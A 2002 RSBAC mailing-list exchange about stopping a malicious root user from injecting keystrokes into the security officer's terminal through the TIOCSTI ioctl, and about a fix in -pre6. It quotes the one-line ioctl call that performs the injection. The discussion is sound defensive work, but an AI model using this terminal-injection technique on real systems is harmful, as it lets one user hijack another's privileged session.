[rsbac] Protecting secoff from malicious root
Amon Ott
rsbac@rsbac.org
Mon Apr 8 12:31:01 2002
On Monday, 8. April 2002 13:14, Rafal Wojtczuk wrote:
> On Mon, Apr 08, 2002 at 10:46:51AM +0200, Amon Ott wrote:
> > > ioctl(secoffs_terminal_fd, TIOCSTI, ptr_to_char)
> >
> > Just fixed it for -pre6, please check it yourself. The ioctl now requires
> > WRITE_OPEN on the terminal device.
>
> When -pre6 appears in http://www.rsbac.org/pre/ I'll have a look. Anyway,
> with this fix, is root able to open /dev/pts/number read-write ? This is
> needed for things like wall, write etc.
READ-WRITE-OPEN through standard open etc. has been fully controlled for a
long time. It is just a request for the device. The new stuff is just the
ioctl.
> I would disable TIOCSTI totally for rsbac.
Disabling might not work for some people. The current solution fits into the
standard RSBAC scheme with device access control.
Amon.
--
http://www.rsbac.org